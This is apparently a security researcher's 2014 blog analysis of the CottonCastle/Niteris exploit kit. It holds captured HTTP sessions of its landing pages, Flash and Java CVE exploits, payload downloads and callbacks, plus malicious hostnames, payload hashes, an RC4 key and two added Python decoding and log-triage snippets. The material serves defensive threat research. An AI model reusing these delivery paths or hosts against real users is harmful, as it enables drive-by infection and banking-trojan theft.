2014-06-09 - Study

Meet Niteris EK (formerly known as CottonCastle)

Pamukkale  (source image: sina.com)

<Edit: 2014-07-13>
On the redirector to CottonCastle :

2014-07-13 - "CottonCastle - realname Niteris ;)"

Thanks for that.
So Plague in Latin it seems.

Thanks to an independent researcher from Russia who shared some referers driving to an Exploit Kit on TCP 27005, I was able to meet again the "Unknown EK" that was first spotted by EKWatcher in September 2013.

Patterns for this EK looked like:

Custom TDS then CottonCastle - 2013-09-16
from GB

GET http://alabamarog.socket-render.info:5125/h2x/3/a627d480c37cfaf6f3634150496340ed/http%3A%2F%2Fgoo.gl%2FoYb4sq
207 Multi-Status (text/html)

GET http://alabamarog.socket-render.info:5125/h2p/3/BG/f444ab1cfeb2945d149c03508367776f.dts
200 OK (application/octed-stream)

GET http://alabamarog.socket-render.info:5125/h2i/3/BG/c708c60762f6a35c5fce213eb840ce51
200 OK (application/octed-stream)

GET http://alabamarog.socket-render.info:5125/callme?r=111
200 OK (text/html)

OT: that infection chain was really interesting.
Off topic 1: the redirecting JS on the compromised website is quite interesting.

The JS in front of the first TDS (http://pastebin.com/T4RLpFuN, 2014-06-05) seems to give a weight to the event and will fire only for IE and Firefox.
Not sure how effective this is (I mean compared to a basic onmousemove).
Reference to Justin Bourque
Reload: 2014-06-06 http://pastebin.com/XeHfVTKU
Reference now to "Michelle reporter"

Off topic 2: from the US, the first TDS will drive you to Angler EK:

Angler EK after first TDS in US
Payload 270fd28f3b9ae3ad071468ec0c03c83d is Vawtrak

and from DE in some cases:
Angler EK after first TDS in DE (in the night)
By day it was redirecting to CottonCastle
Fully working on 2014-06-05 but 409 on 2014-06-06
Payload 6f56f55c38be1cdad7ca498f4e93e219 fires some Glupteba rules by Emerging Threats
Suricata with ET rules alerts on traffic generated by 6f56f55c38be1cdad7ca498f4e93e219
In some cases, from Russia I got both CottonCastle's TDS and a Nuclear Pack

First TDS redirecting to both CottonCastle's TDS and Nuclear Pack
From Russia 2014-06-06
Payload was: b8d913208d4230b2ff7ddc01a1ddef07

Now back to CottonCastle.
The pattern did not change that much. It now looks like:

2 TDS then CottonCastle - 2014-06-05 from DE
Note the c.hit.ua counter both on the second TDS and in the landing.
Note the reversed 2-letter country code in many calls.

There are points that I have trouble explaining.
The day after, the counter had disappeared and the Exploit Kit seemed not to be replying to hosts from RU/UA. Really strange when we see what those counters were like on the 5th:

Distribution of countries hitting the Exploit Kit landing

Distribution of OS hitting the Exploit Kit landing

One month of stats on the counter that was associated to the landing
(note...EK is not associated to that counter right now)
Now let's see how this Exploit Kit is "weaponized".

CottonCastle : CVE-2013-0634

Successful pass for CVE-2013-0634 in CottonCastle (from CA)
(post shellcode call missing here)

GET http://afasaq.jax-updates .pw:4433/forum/view/3/494f2e325d7efeaa894484780954a500/http%3A%2F%2Fherites.in%2Ffeeling%2Ffdhsasfetgfvsaxa%2F
203 Non-Authoritative Information (text/html)

Part of CottonCastle landing (full here : http://pastebin.com/k3nuNY5M)
tied to the flash  exploit
GET http://afasaq.jax-updates .pw:4433/forum/tracker/3/AC/be2a27de7a3778b96a858d59d4569ba4/348.338.161.453/
200 OK (application/x-shockwave-flash)
The day before it was: c224580e17d8bd4c251da29ea8bef647
This is where the CottonCastle name comes from
(idea of Will Metcalf from Emerging Threats)

GET http://afasaq.jax-updates .pw:4433/forum/advertisement/3/AC/464feda74d209abca9a05f244f4d7f3e
200 OK (text/html)  ( detailed in CVE-2013-2465 pass)

GET http://afasaq.jax-updates .pw:4433/forum/torrents/3/AC/37e8ccf9bf7a70d40d877bb592bd788a
200 OK (application/x-bittorrent) Decrypted payload : 953bf448637203cec92ea2d605a47d0c  Payload is Corkow (Thx Denis Laskov )

In that case I blocked the shellcode from executing the payload.

Shellcode trying to execute payload.
But after infection you should see this:
GET http://afasaq.jax-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)

Host IP:
47447 | | TTM | DE | 23MEDIA.EU | 23MEDIA GMBH

CottonCastle : CVE-2014-0515

It's the first time I see it in an Exploit Kit

CVE-2014-0515 firing in CottonCastle from DE
2014-06-05 - Flash

GET http://ajigin.iam-updates .pw:4433/forum/view/3/f2fdfed9c68b57f0ce6427defab7aa08/http%3A%2F%2Fherites.in%2Ffeeling%2Ffdhsasfetgfvsaxa%2F
203 Non-Authoritative Information (text/html)

GET http://ajigin.iam-updates .pw:4433/forum/tracker/3/ED/333f38dc127936ab62ca5ce517c1ccd0/346.343.343.481/
200 OK (application/x-shockwave-flash) 180e226457d9370ba590ca2a722e446f

GET http://ajigin.iam-updates .pw:4433/forum/advertisement/3/ED/4babaee37c31c47fe9dadc004f7a8732
200 OK (text/html) ( detailed in CVE-2013-2465 pass)

GET http://ajigin.iam-updates .pw:4433/forum/torrents/3/ED/277ff652f2cb92471a6abfd2a5f26341
200 OK (application/x-bittorrent) Decrypted payload 7773524265ed5409938950bfc7fca574 (same day i also got: 7794934b674a07d42b0e20a6acd49039 ) Again  Payload is Corkow (Thx Denis Laskov )

GET http://ajigin.iam-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)

CottonCastle : CVE-2013-2465

CottonCastle firing code exploiting CVE-2013-2465 to java6u45
GET http://abuzuc.jax-updates .pw:4433/forum/view/3/f379a32d59f0fe08d75cecbb9b12b558/http%3A%2F%2Fherites.in%2Ffeeling%2Ffdhsasfetgfvsaxa%2F
203 Non-Authoritative Information (text/html)

Part of the landing tied to that exploit
(full here : http://pastebin.com/Spv9TYvd )
Note: "OrbitWhite" is the RC4 key for the rc function in the jar file.
Session after Hex2bin and rc4 decryption : http://abuzuc.jax-updates.pw:4433/forum/advertisement/3/AC/b87f6bc7ee855098e825312e151cc54c
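
The hex2bin and RC4 step noted above, as an added example for decoding such a landing parameter during analysis (not EKWatcher's routine and not code from the kit). It assumes standard RC4 with the key taken as ASCII bytes; `decode_param` and the sample blob are constructed for illustration.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4 (KSA + PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # keystream generation and XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def decode_param(hex_blob: str, key: str = "OrbitWhite") -> str:
    """hex2bin, RC4-decrypt and return the text; ValueError on malformed input."""
    cleaned = "".join(hex_blob.split())       # tolerate line breaks from copy/paste
    try:
        raw = bytes.fromhex(cleaned)
    except ValueError as exc:
        raise ValueError("parameter is not hex") from exc
    plain = rc4(key.encode("ascii"), raw)
    # A wrong key or a non-standard RC4 variant yields binary noise, not a URL.
    if not all(0x20 <= b < 0x7F for b in plain):
        raise ValueError("decrypted bytes are not printable ASCII")
    return plain.decode("ascii")

# Constructed sample: a placeholder URL encrypted here with the key from the landing.
SAMPLE_URL = "http://ek.example.test:4433/forum/advertisement/3/AC/" + "0" * 32
SAMPLE_BLOB = rc4(b"OrbitWhite", SAMPLE_URL.encode("ascii")).hex()

if __name__ == "__main__":
    print(decode_param(SAMPLE_BLOB))
```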

GET http://abuzuc.jax-updates .pw:4433/forum/profile/3/AC/874a6ece58907e1f46934ea503aede0d.djvu
200 OK (text/html)  

jnlp 2014-06-06 http://pastebin.com/FNQgEbrt

GET http://abuzuc.jax-updates .pw:4433/forum/topic/3/AC/c94043e9a1ef9b59b382d5803fa3dadd.mkv
200 OK (application/octed-stream)  Exploit for CVE-2013-2465

The java dropped to jre6u45 is nice :)
p.dat (nested jar) :  f763401bcb93f9bd3ea3f1e6b1e58611
java.dll : d.dat : 279f500d9d3aff957ff9e67ffd5165ed
j.js : http://pastebin.com/0GXycyMS

GET http://abuzuc.jax-updates .pw:4433/forum/advertisement/3/AC/b87f6bc7ee855098e825312e151cc54c
200 OK (text/html) http://pastebin.com/JrTXX5eF

Contains a vbs script
(note the security product process names)

GET http://abuzuc.jax-updates .pw:4433/forum/torrents/3/AC/7dc49f51e16116534357d5918c33a29a
200 OK (application/x-bittorrent) Decoded payload f2788007f8b27dedac15aca71d0bf8f2  Corkow

Once again I blocked the payload execution, but if infected you should get:

Call back to EK once payload is executed

GET abuzuc.jax-updates  .pw:4433/forum/posting/111/
409 Conflict (text/html) 

CottonCastle : CVE-2013-0422

I won't go into as much detail as I did for CVE-2013-2465, but it's the same approach.

GET http://bzycok.key-updates .pw:4433/forum/view/3/8216ed0f457b3ac54ca52cd13383fe25/http%3A%2F%2Fleveloped.in%2Fgovernment%2F70d83bde3d5f7e09%2F
203 Non-Authoritative Information (text/html)

GET http://bzycok.key-updates .pw:4433/forum/profile/3/LN/0d240529777cb6a302fdbbc437633a3d.djvu
200 OK (text/html)

GET http://bzycok.key-updates .pw:4433/forum/topic/3/LN/5453f6a894b378e19e5af7cce177803c.mkv
200 OK (application/octed-stream) 

Piece of CVE-2013-0422 in CottonCastle 2014-06-06

GET http://bzycok.key-updates .pw:4433/forum/advertisement/3/LN/54642665c1bd63f868f64db861c8a953
200 OK (text/html)   Encoded VBS

GET http://bzycok.key-updates .pw:4433/forum/topic/3/LN/5453f6a894b378e19e5af7cce177803c.mkv
409 Conflict (text/html)

GET http://bzycok.key-updates .pw:4433/forum/torrents/3/LN/1053ddb4e24bf9361a07d6bd5ed345ba
200 OK (application/x-bittorrent)  < Decoded Payload : 22e98a119b8e0f1c0616fd7e377d0ec6 same family as previous.

GET http://bzycok.key-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)

CottonCastle : CVE-2013-2460

Once again I won't go into as much detail as I did for CVE-2013-2465, but it's the same approach.
CVE-2013-2460 in CottonCastle : 2

GET http://bkysur.key-updates .pw:4433/forum/view/3/22bd553e598f5b43b7cfee1ee2630080/http%3A%2F%2Fleveloped.in%2Fgovernment%2F70d83bde3d5f7e09%2F
203 Non-Authoritative Information (text/html)

GET http://bkysur.key-updates .pw:4433/forum/profile/3/AC/bbce0e49bfc08250668441d0b80b7a63.djvu
200 OK (text/html)

GET http://bkysur.key-updates .pw:4433/forum/topic/3/AC/f2fe8bbc9c621e65a054598f8109a9a3.mkv
200 OK (application/octed-stream)  be66263cd1524b72423c0b5ec8094113

CVE-2013-2460 in CottonCastle 2014-06-06
GET http://bkysur.key-updates .pw:4433/forum/topic/3/AC/f2fe8bbc9c621e65a054598f8109a9a3.mkv
409 Conflict (text/html)

GET http://bkysur.key-updates .pw:4433/forum/advertisement/3/AC/540ff821785fd90aeed5e30ee351a6c9
200 OK (text/html) Encoded VBS

GET http://bkysur.key-updates .pw:4433/forum/torrents/3/AC/bc5215485d8c485b2b277a5f569a6bad
200 OK (application/x-bittorrent)

GET http://bkysur.key-updates .pw:4433/forum/posting/111/
409 Conflict (text/html)
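
The sessions above all share one URL layout, so proxy logs can be triaged by stage and by the reversed country code. This is an added example, not code from the post or the kit: the stage labels, function names and sample URLs are constructed, and it assumes an explicit port as in the logged requests.

```python
import re
from collections import defaultdict
from urllib.parse import unquote
# Path words come from the sessions logged above; the descriptions are this example's labels.
STAGES = {
    "view": "landing",
    "tracker": "Flash exploit",
    "profile": "Java stage page (.djvu)",
    "topic": "Java exploit (.mkv)",
    "advertisement": "encoded VBS",
    "torrents": "encoded payload",
    "posting": "callback after payload execution",
}
URL_RE = re.compile(
    r"^https?://(?P<host>[^/:]+):(?P<port>\d+)/forum/(?P<stage>[a-z]+)/\d+/"
    r"(?:(?P<cc>[A-Z]{2})/)?(?:(?P<token>[0-9a-f]{32})(?P<rest>.*))?$"
)

def classify(url):
    """Return the parsed fields of a URL in this layout, or None when it does not fit."""
    m = URL_RE.match(url)
    if not m or m["stage"] not in STAGES:
        return None
    if m["stage"] != "posting" and not m["token"]:
        return None  # every stage except the callback carries a 32-hex token
    hit = {"host": m["host"], "port": int(m["port"]), "stage": STAGES[m["stage"]]}
    if m["cc"]:
        hit["country"] = m["cc"][::-1]  # code is sent reversed: "ED" means DE
    if m["stage"] == "view":
        hit["referer"] = unquote(m["rest"].lstrip("/"))  # URL-encoded referer
    return hit

def chains(urls):
    """Group matching requests per host, in the order the stages were requested."""
    seen = defaultdict(list)
    for url in urls:
        hit = classify(url)
        if hit:
            seen[hit["host"]].append(hit["stage"])
    return dict(seen)

# Constructed sample: hosts, tokens and numbers are made up; only the layout follows the post.
SAMPLE = [
    "http://ek.example.test:4433/forum/view/3/" + "a" * 32 + "/http%3A%2F%2Ftds.example.test%2Fx%2F",
    "http://ek.example.test:4433/forum/tracker/3/ED/" + "b" * 32 + "/111.222.333.444/",
    "http://ek.example.test:4433/forum/torrents/3/ED/" + "c" * 32,
    "http://ek.example.test:4433/forum/posting/111/",
    "http://board.example.test:80/forum/view/3/topic-title",
]
```

A host whose chain ends with the callback stage is the one to prioritise, since the post shows that request only after the payload has executed.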

CottonCastle : CVE-2013-2551:

This CVE has been captured by Set_Abominae, covered by Malwageddon and identified by regenpijp1.
I may update this post later once I face it.


CVE-2011-3544 ?? -- Didn't have the opportunity to check the EK with Java6 < 27 or at least < 18.
AV Process name Callback test. CVE-2013-2551 path.

Exploitation Graph :

This Exploit Kit is not widely used (maybe only by the operators of the Corkow botnet - and 2nd TDS).

Files: Here


Niteris Exploit Kit Screenshot : Source Group-IB
(page 10 of this report (PDF)  on buhtrap )


Credits: Thanks to Timo Hirvonen for confirming the 2 Flash CVEs, to Arseny Levin for defining the CVE-2013-2460. Thanks to EKWatcher for the RC4 decryption routine. Thanks to Will Metcalf for many inputs. And warm thanks to the "independent researcher from Russia" for the Referer. Thanks to Denis Laskov for identifying the payload.

Read more :
CottonCastle EK: "I hate to break this to you, but this isn't gonna be an open casket." - 2014-04-08 - Malwageddon
Corkow: Analysis of a business-oriented banking Trojan - 2014-02-27 - Robert Lipovsky - ESET

Post - publication Reading :
APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks - 2016-02-08 - TheSecureList
Another look at Niteris : post exploitation WMI and Fiddler checks - 2015-05-12